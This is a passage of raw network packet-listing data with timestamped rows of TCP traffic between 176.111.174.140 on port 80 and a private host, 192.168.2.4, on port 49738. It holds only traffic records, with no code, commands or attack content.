                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.639880896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.640355110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.640809059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.640886068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.640971899 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.641906023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.641968966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.642044067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.643059015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.643162012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.643249035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.644141912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.644212008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.644624949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.645293951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.645421028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.645627975 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.646334887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.646392107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.646480083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.647475958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.647587061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.647752047 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.648711920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.648906946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.649041891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.649740934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.649904966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.649985075 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.650887012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.650952101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.651031971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.651962996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.652080059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.652225018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.653127909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.653425932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.653558016 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.654242039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.654354095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.654455900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.655426025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.655520916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.655687094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.656470060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.656572104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.656656027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.657592058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.657643080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.658011913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.658754110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.658921003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.659006119 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.659862041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.659936905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.660018921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.660990000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.661139965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.661218882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.662014008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.662075996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.662158966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.663186073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.663319111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.663485050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.664266109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.664375067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.664499044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.665659904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.665867090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.666158915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.666810036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.666872025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.666943073 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.667783976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.667968988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.668092966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.668765068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.668828011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.668910027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.669867992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.670037031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.670165062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.670948029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.725341082 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.804580927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.804725885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.804862022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.805068016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.805388927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.805491924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.806180954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.806299925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.806384087 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.807363987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.807446957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.807528973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.808417082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.808542967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.808630943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.809557915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.809612036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.809700012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.810648918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.810766935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.810848951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.811794043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.811919928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.812141895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.813049078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.813129902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.813227892 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.814033031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.814196110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.814275026 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.815207958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.815268993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.815366030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.816272974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.816344023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.816425085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.817379951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.817500114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.817584991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.818490982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.818603992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.818691969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.819641113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.819725037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.819801092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.820755959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.820838928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.820976973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.821897030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.822002888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.822089911 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.822999954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.823141098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.823229074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.824098110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.824213982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.824295998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.825228930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.825335979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.825416088 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.826337099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.826491117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.826585054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.827450991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.827584028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.827670097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.828604937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.828713894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.828821898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.829771042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.829881907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.829963923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.830830097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.830954075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.831132889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.832062006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.832180023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.832279921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.833190918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.833282948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.833416939 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.834343910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.834440947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.834526062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.835319042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.835412979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.835541010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.836411953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.836481094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.836554050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.837528944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.837651968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.837740898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.838666916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.838749886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.838835955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.839811087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.840019941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.840101957 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.840924978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.841054916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.841144085 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.842062950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.842132092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.842221975 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.843188047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.843292952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.843381882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.844333887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.844525099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.844647884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.845422029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.845484972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.845570087 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.846527100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.846687078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.846780062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.847636938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.847762108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.847851038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.848767996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.848887920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.848975897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.849926949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.850039005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.850167990 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.851568937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.851582050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.851661921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.852086067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.852289915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.852375031 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.853216887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.853307009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.853475094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.854309082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.854448080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.854538918 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.855484009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.855585098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.855690002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.856673956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.856776953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.856861115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.857814074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.857923985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.858037949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.858968019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.859114885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.859201908 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.860388041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.860431910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.860516071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.861388922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.861613989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.861695051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.862485886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.862620115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.862734079 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.863708973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.912873030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.997771025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.997848988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.997972012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.998271942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.998378992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.998519897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.999495983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.999640942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.999731064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.000472069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.001113892 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.001188993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.001262903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.001950979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.002006054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.002074003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.003292084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.003348112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.003493071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.004467964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.004478931 CET8049738176.111.174.140192.168.2.4
